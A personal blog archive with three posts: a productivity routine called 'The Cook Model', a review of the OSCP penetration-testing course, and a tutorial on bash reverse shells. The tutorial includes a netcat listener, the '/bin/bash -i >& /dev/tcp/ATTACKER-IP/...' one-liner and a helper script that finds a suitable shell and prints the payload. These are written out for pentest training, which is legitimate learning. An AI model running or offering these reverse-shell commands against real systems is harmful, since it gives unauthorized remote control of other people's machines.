Getting things done. The Cook Model

All of us have projects to finish, and many people abandon their projects for different reasons. In this post I will talk about a routine I usually follow to help me finish my projects; I hope you find it useful.

I call this routine The Cook Model. It is simple yet effective: just like any meal you want to prepare, you have to follow three phases in sequence to end up with an enjoyable meal.

1. Prepare:

This is the initial phase and, I think, the most important one. In this phase you are hungry and start preparing for the meal: buying the groceries, reading the cooking instructions and so on.

The same goes for projects: you have to know why you want to start this project, why it is important to you and what the expected result is.
Your strategy must be clear and defined. Be honest with yourself and take into consideration all the hurdles you may face and what resources or tools can help you.
Take as much time as you want in this phase to do your research, set a plan, buy tools/books, talk to people, look for alternatives and so on.
By finishing this phase you will have an agenda to follow with specific tasks and a time frame.

2. Cook:

Cook your meal! Follow the agenda from phase 1 step by step. You can't change your mind now in the middle of cooking by taking the chicken off the grill and trying to fry it; you will ruin the whole meal.

This is the action time: you have to follow your agenda step by step and believe in the work you did in phase 1.
You have to be patient and persistent. It is a one-way route and you can't rethink the plan or try to take a detour. This is where most people fail: they keep questioning their goal/plan and try to start all over again, and so they end up juggling around in the hope of finding a better arrangement.
I can sum up this phase in one word: "commitment".

3. Result:

Now that you have done your job it's time to taste the meal: is it salty? Does it need more time? Or is it just delicious?

In this phase it is not important whether you succeed or fail; be proud of the effort you have made, because you did reach the final destination. Some people get stuck in the previous phases and never reach this final phase, so the project stays unfinished for them and they can neither enjoy the result nor evaluate the failure.
If you succeed, then be happy and enjoy your achievement. If not, there are lessons to be learned from this experience, and you can start all over again by modifying phase 1 and continuing your project.

Fin:

You only need one person's approval, and that person is you. Take responsibility for your project and stop caring about other people's opinions/experiences.
Most people fail because they get stuck in an infinite loop between phase 1 and phase 2 for different reasons (other people's opinions / self-doubt / circumstances / etc.).
This is a one-way route and you have to keep moving forward; don't hesitate or settle for less.

OSCP Review

Intro:

I have been developing software for years; however, I recently had a great chance to switch my career path to the security field, and that is why I started looking for training to gain more skills.
Security for a software developer means writing good code, running scanners, setting up a firewall, etc.,
but there is still a missing link: how do hackers break into servers, and what tools and techniques do they use?

Enter OffSec:

In my journey to find the right training I reached OffSec, since I was already using Kali Linux as a platform for running scanners.
I was skeptical at first, but after reading different reviews I decided to enroll in the PWK course, since I am a big fan of Linux and I needed training with hands-on experience to understand how hacking happens.

Materials:

Fast forward: after registration I received the e-mail package and started reading…
Well, I have to say this is indeed a 101 course, but the topics covered are broad and wide.
OffSec takes you on a journey through all the hacking topics; you learn the How and the Why of each concept in a self-learning way.
As Morpheus said: "I'm trying to free your mind, Neo. But I can only show you the door. You're the one that has to walk through it."
I spent two months reading the materials without rushing, to get to know all the topics and connect the dots before hitting the lab. At the same time I solved the exercises and skipped the ones that required more engagement, to do them later on.

Lab:

After finishing the reading and taking a one-month summer vacation, I was ready to hit the lab.
I have to say the lab is just fantastic! I was overwhelmed and running around like a lost sheep for the first few days, but after that I started enumerating the whole lab network and hacking the low-hanging-fruit boxes first.
I spent approximately 3.5 months hacking the lab machines and was able to hack fantastic boxes like PAIN, Sufferance and gh0st. But personally I like dotty best.

Exam:

After hitting 32 boxes, I felt ready to take the exam to test my skills.
My first attempt went badly and I failed; the exam is BRUTAL, but it was an eye-opener and I learned my weaknesses.
I took multiple exam attempts, and with each attempt I gained more and more skills. It is a tough process, but the payoff is HUGE and I learned/tuned a lot of things.
If you want to take the exam you have to be 100% ready for it; 80% or 90% will not be enough. You have to Try Harder and Harder.
On Saturday 25-3-2017 I passed the OSCP exam with a BIG smile. It went smoothly and I was able to finish the exam along with writing the report within the 24-hour time slot.

Recommendations:

  • You have to change your mindset. In this course you have to think like a hacker or a breaker: developers expect the code to work in a certain way, but the hacker will try to twist the code to get in.
  • Study and research. You have to read a lot of information and test it to understand what is happening and why.
  • It's simple. Sometimes it is plain simple to hack in and you do not have to go deep down the rabbit hole.
  • Set a game plan. Know your target very well and spend time reading the enumeration data to set a proper game plan before you start hacking; otherwise you will waste your resources.
  • Practice. Download images from Vulnhub.com and practice. I also find the walkthroughs a great way to learn from other people's experience.

Final Thoughts:

I encourage anyone seriously interested in information security or hacking to enroll in the PWK course; the learning curve is steep and you will learn a lot of things in a short amount of time.
You have to dedicate effort/time to this course, otherwise you can't learn or pass the exam.
The community and the OffSec people are great and you will learn many new things. I will definitely enroll in other courses and try to engage more in the community.

References:

The links below helped me a lot when I was studying the course.

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

http://www.fuzzysecurity.com/tutorials/16.html

https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

http://www.primalsecurity.net/0x0-exploit-tutorial-buffer-overflow-vanilla-eip-overwrite-2/

http://www.blackhillsinfosec.com/?p=4645

https://highon.coffee/blog/lfi-cheat-sheet/

http://netsec.ws/?p=331

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Bash Reverse Shell

In this post I will talk about a special type of reverse shell. I like this type of shell because most of the time you can use tools that already exist on your target.

But before going into the details of the Bash reverse shell, I would like to mention some limitations of this type of shell:

  • You can't use this type of shell against Windows targets, since bash is normally not there (unless a bash port such as WSL, Cygwin or Git for Windows has been installed).
  • You can't use this type of shell if the Unix-like target does not have the Bash package installed. The /dev/tcp redirection used below is a bash feature (ksh93 implements it as well); the classic Bourne shell and dash, which is /bin/sh on Debian and Ubuntu, do not understand it and will just report that the file does not exist. On such a target you need another transport, such as nc, python or perl.

Now all you have to do is set up a nc listener on your attacking machine:

nc -nlvp PORT

Then issue this command on your target:

/bin/bash -i >& /dev/tcp/ATTACKER-IP/ATTACKER-PORT 0>&1

where:

  • ATTACKER-IP is your attacking machine's IP address
  • ATTACKER-PORT is the port your nc listener is bound to

And that's it! You should have a bash reverse shell by now. The one-liner works thanks to two bash capabilities: /dev/tcp/HOST/PORT is a pseudo-file that bash resolves by opening a TCP connection to HOST:PORT, and the redirections wire the interactive shell's file descriptors to that socket: ">&" sends both stdout and stderr into the connection, and "0>&1" makes stdin read from the same socket, so whatever you type into nc is executed by the shell and the output comes back to you.

You can replace /bin/bash with /bin/sh only if /bin/sh on the target is really bash (or another shell that implements /dev/tcp, such as ksh93), as it is on RHEL/CentOS. On Debian and Ubuntu /bin/sh is dash and the command will fail, so check which shell /bin/sh actually is before relying on it.

Final Thoughts:

As always, you have to enumerate your target to know the environment in front of you. In our case you have to check whether bash (or sh) exists, where it is located, and whether that shell actually supports /dev/tcp.
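The enumeration step above, as an added example that is not part of the original post: a small POSIX sh script to run on the target that looks for a shell able to carry the /dev/tcp reverse shell and then prints the one-liner for it. The candidate paths, the attacker IP and the port are assumptions; the check is a heuristic (it trusts the shell's own BASH_VERSION) and will be fooled by a bash built without network redirections, which some distributions used to ship.

```shell
#!/bin/sh
# Added example, not code from the original post: find a shell on the target
# that implements bash's /dev/tcp redirection and build the reverse-shell line.
# Paths, IP and port below are assumptions for illustration.

# Return 0 if the interpreter at $1 exists and reports itself as bash.
# Heuristic: /dev/tcp/HOST/PORT is a bash feature; dash (the /bin/sh of
# Debian/Ubuntu) and the classic Bourne shell do not implement it. A bash
# compiled with --disable-net-redirections would still pass this check.
supports_dev_tcp() {
  candidate="$1"
  [ -x "$candidate" ] || return 1
  "$candidate" -c '[ -n "$BASH_VERSION" ]' 2>/dev/null
}

# Print the first candidate path that passes the check; fail if none does.
# The list holds typical locations; extend it with what your enumeration found.
find_shell() {
  for s in /bin/bash /usr/bin/bash /usr/local/bin/bash /bin/sh; do
    if supports_dev_tcp "$s"; then
      printf '%s\n' "$s"
      return 0
    fi
  done
  return 1
}

# Print the one-liner for a given shell path, attacker IP and listener port.
# '>&' sends stdout and stderr to the socket, '0>&1' makes stdin read from it.
build_payload() {
  printf '%s -i >& /dev/tcp/%s/%s 0>&1\n' "$1" "$2" "$3"
}

# Usage on the target: sh revshell_probe.sh ATTACKER-IP ATTACKER-PORT
if [ "$#" -eq 2 ]; then
  shell=$(find_shell) || { echo "no shell with /dev/tcp support found" >&2; exit 1; }
  build_payload "$shell" "$1" "$2"
fi
```

With a listener already waiting (nc -nlvp 4443 on the attacking machine), running the script as sh revshell_probe.sh 10.10.14.5 4443 prints the exact line to paste into your foothold; if it prints nothing and exits non-zero, bash is not available and you should fall back to a different reverse-shell transport rather than try /bin/sh blindly.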

This post serves as a short note on how to create a Bash reverse shell; please read more about the software or technology used in the references.

Regards,

Fahad.


references: